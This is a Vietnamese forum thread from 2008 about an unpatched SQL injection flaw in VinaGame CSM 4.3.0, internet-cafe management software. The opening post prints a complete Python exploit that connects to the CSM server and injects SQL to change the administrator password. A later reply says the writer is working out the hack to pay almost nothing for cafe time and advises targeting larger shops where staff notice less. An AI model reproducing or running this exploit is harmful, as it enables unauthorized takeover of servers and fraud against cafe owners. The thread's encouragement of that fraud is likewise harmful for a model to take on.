Trang chủ EDA | Doman - Hosting | Siêu thị trực tuyến

VinaGame CSM vẫn chưa được vá lỗi

VinaGame CSM vẫn chưa được vá lỗi

Gửi bàigửi bởi Phan Quốc Hiên » Thứ 3 29 Tháng 7, 2008 11:54 am

Phiên bản: 4.3.0
Lỗi SQL Injection của phần mềm quản lý phòng net VinaGame CSM đã được BlueMoon cảnh báo VinaGame hồi tháng 5/2008 nhưng đến nay phiên bản mới nhất mình download từ trang http://csm.vinagame.com.vn vẫn còn dính lỗi này. Lỗi này cho phép người tấn công có thể change password admin của CSM Manager ở máy chủ bằng 1 đoạn code khá đơn giản viết bằng Python!
Code Exploit:
Mã: Chọn tất cả
import socket
import struct
import threading
import time

MAYCHU = 'dien_dia_chi_may_chu_o_day_ne_hay_hostname_cung_duoc'
MAYTRAM = '192.168.0.1'#FAKE
MATKHAU_MOI = 'chomaynhodoi'

def send_command(s, cmd, content):
        buf = struct.pack("II", cmd, 0)
        buf += content
        buf += (208 - len(buf)) * '\x00'
        s.send(buf)

def recv(s):
        buf = s.recv(208)
        while len(buf) > 0:
                print len(buf), hex(ord(buf[0]))
                buf = s.recv(208)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((MAYCHU, 1212))
send_command(s, 0x33, "Hitle;%s;4.3.0" % MAYTRAM)
send_command(s, 0x37, "Poc;0;14")
send_command(s, 0x4C, "20480")
send_command(s, 0x34, "0;14")

kicker = threading.Thread(target=recv, args=(s,))
kicker.setDaemon(True)
kicker.start()

for i in range(5):
        send_command(s, 0x96, "")
        time.sleep(2)

send_command(s, 0x36, "Admin;') OR remaintime > 0 and ('1'='1")
time.sleep(5)

send_command(s, 0x40, "208634")
send_command(s, 0x41, "22631")
send_command(s, 0x35, "1;30;PoC")

for i in range(5):
        buf = '\x96' + 207 * '\x00'
        s.send(buf)
        time.sleep(2)

send_command(s, 0x38, "Admin;') OR ('1'='1;%s" % MATKHAU_MOI)

for i in range(5):
        send_command(s, 0x96, "")
        time.sleep(2)

s.close()


Nguồn: htttp://bluemoon.com.vn
Sửa lần cuối bởi Phan Quốc Hiên vào ngày Chủ nhật 07 Tháng 9, 2008 10:40 am với 1 lần sửa trong tổng số.
wtf
Hình đại diện của thành viên
Phan Quốc Hiên
 
Bài viết: 49
Ngày tham gia: Thứ 7 14 Tháng 6, 2008 8:41 am
Đến từ: Quê Hương Đồng Khởi

Re: VinaGame CSM vẫn chưa được vá lỗi

Gửi bàigửi bởi hailua82 » Thứ 3 29 Tháng 7, 2008 3:02 pm

Thằng VinaGame làm gì đủ trình độ để fix cái lổi đó ! Toàn là con ông cháu cha làm không hà ! ngu bỏ mẹ đi !

Tụi nó thấy cũng chẳng ăn nhậu gì đến chúng nên bỏ luôn ! Chỉ tội cho mấy thằng chủ NET !

He he he !
hailua82
 
Bài viết: 4
Ngày tham gia: Thứ 3 29 Tháng 7, 2008 2:26 pm

-----------Pruned-------

Gửi bàigửi bởi Phan Quốc Hiên » Thứ 3 29 Tháng 7, 2008 3:08 pm

-----------Pruned-------
Sửa lần cuối bởi Phan Quốc Hiên vào ngày Thứ 7 28 Tháng 7, 2012 9:24 pm với 1 lần sửa trong tổng số.
wtf
Hình đại diện của thành viên
Phan Quốc Hiên
 
Bài viết: 49
Ngày tham gia: Thứ 7 14 Tháng 6, 2008 8:41 am
Đến từ: Quê Hương Đồng Khởi

Re: VinaGame CSM vẫn chưa được vá lỗi

Gửi bàigửi bởi hadobac » Thứ 4 30 Tháng 7, 2008 9:18 am

Hic, em đang nghiên cứu cách làm thế nào hack được cái này đây... phấn đấu vào 2 tiếng đồng hồ trả 1k :D

Nhưng em khuyên các bác, nên kiếm tiệm nào to to một tí, tiệm nhỏ người ta dễ nhận ra lắm :idea:
Software is like sex, it's better when it's free! - Linux Torvard -
--------------------------------------------------------------------------------------------
Trong Terminal có cái lệnh "Sudo" nghe giống "Sumo" nhỉ :))
--------------------------------------------------------------------------------------------
Spam vừa thôi nhé...

Hình ảnh
hadobac
 
Bài viết: 174
Ngày tham gia: Chủ nhật 29 Tháng 6, 2008 5:02 pm
Đến từ: /usr/share

Re: VinaGame CSM vẫn chưa được vá lỗi

Gửi bàigửi bởi Phan Quốc Hiên » Chủ nhật 24 Tháng 8, 2008 9:38 am

-----------Pruned-------
Sửa lần cuối bởi Phan Quốc Hiên vào ngày Thứ 7 28 Tháng 7, 2012 9:16 pm với 1 lần sửa trong tổng số.
wtf
Hình đại diện của thành viên
Phan Quốc Hiên
 
Bài viết: 49
Ngày tham gia: Thứ 7 14 Tháng 6, 2008 8:41 am
Đến từ: Quê Hương Đồng Khởi

Re: VinaGame CSM vẫn chưa được vá lỗi

Gửi bàigửi bởi Phan Quốc Hiên » Chủ nhật 07 Tháng 9, 2008 10:36 am

Cơ bản thì chưa phát hiện lỗi gì ở phiên bản mới 4.3.1 :D
wtf
Hình đại diện của thành viên
Phan Quốc Hiên
 
Bài viết: 49
Ngày tham gia: Thứ 7 14 Tháng 6, 2008 8:41 am
Đến từ: Quê Hương Đồng Khởi


Quay về Security Zone

Ai đang trực tuyến?

Đang xem chuyên mục này: Không có thành viên nào đang trực tuyến2 khách

cron